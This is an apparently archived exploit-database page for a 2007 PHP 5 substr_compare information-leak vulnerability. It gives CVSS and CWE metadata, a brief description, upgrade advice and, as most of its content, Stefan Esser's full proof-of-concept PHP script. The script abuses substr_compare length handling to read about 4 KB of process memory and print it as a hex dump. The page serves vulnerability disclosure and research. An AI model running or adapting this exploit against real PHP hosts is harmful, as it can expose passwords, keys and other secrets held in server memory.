header-logo
Suggest Exploit
vendor:
PHP
by:
Stefan Esser
5.5
CVSS
MEDIUM
Information Leak
200
CWE
Product Name: PHP
Affected Version From: PHP 5
Affected Version To: PHP 5
Patch Exists: NO
Related CWE:
CPE: a:php:php
Metasploit:
Other Scripts:
Platforms Tested:
2007

PHP 5 – substr_compare Information Leak Vulnerability

This vulnerability allows an attacker to leak sensitive information from memory using the substr_compare function in PHP 5. By manipulating the function parameters, an attacker can retrieve data from memory that should not be accessible. This can lead to the exposure of sensitive information such as passwords or cryptographic keys.

Mitigation:

Upgrade to a version of PHP that has patched this vulnerability. Check with the vendor for available patches and updates.
Source

Exploit-DB raw data:

<?php
  ////////////////////////////////////////////////////////////////////////
  //  _  _                _                     _       ___  _  _  ___  //
  // | || | __ _  _ _  __| | ___  _ _   ___  __| | ___ | _ \| || || _ \ //
  // | __ |/ _` || '_|/ _` |/ -_)| ' \ / -_)/ _` ||___||  _/| __ ||  _/ //
  // |_||_|\__,_||_|  \__,_|\___||_||_|\___|\__,_|     |_|  |_||_||_|   //
  //                                                                    //
  //         Proof of concept code from the Hardened-PHP Project        //
  //                   (C) Copyright 2007 Stefan Esser                  //
  //                                                                    //
  ////////////////////////////////////////////////////////////////////////
  //        PHP 5 - substr_compare Information Leak Vulnerability       //
  ////////////////////////////////////////////////////////////////////////

  // This is meant as a protection against remote file inclusion.
  die("REMOVE THIS LINE");

  $sizeofHashtable = 39;
  $maxlong = 0x7fffffff;
  if (is_int($maxlong+1)) {
    $sizeofHashtable = 67;
    $maxlong = 0x7fffffffffffffff;
  }

  $memdump = str_repeat("A", 4096);
  for ($i=0; $i<40; $i++) $d[] = array();
  unset($d[20]);
  $x = str_repeat("A", $sizeofHashtable);
  
  // If the libc memcmp leaks the information use it
  // otherwise we only get a case insensitive memdump
  $b = substr_compare(chr(65),chr(0),0,1,false) != 65;

  for ($i=0; $i<4096; $i++) {
    $y = substr_compare($x, chr(0), $i+1, $maxlong, $b);
    $Y = substr_compare($x, chr(1), $i+1, $maxlong, $b);
    if ($y-$Y == 1 || $Y-$y==1){
      $y = chr($y);
      if ($b && strtoupper($y)!=$y) {
        if (substr_compare($x, $y, $i+1, $maxlong, false)==-1) {
          $y = strtoupper($y);
        }
      }
      $memdump[$i] = $y;
    } else {
      $memdump[$i] = chr(0);
    }
  }
  
  echo "memdump\n---------\n\n";
  
  for ($b=0; $b<strlen($memdump); $b+=16) {
    printf("%08x: ", $b);
    for ($i=0; $i<16; $i++) {
      printf ("%02x ", ord($memdump[$b+$i]));
    }
    for ($i=0; $i<16; $i++) {
      $c = ord($memdump[$b+$i]);
      if ($c >= 127 || $c < 32) {
        $c = ord(".");
      }
      printf ("%c", $c);
    }
    printf("\n");
  }

?>

# milw0rm.com [2007-03-07]
cqrsecured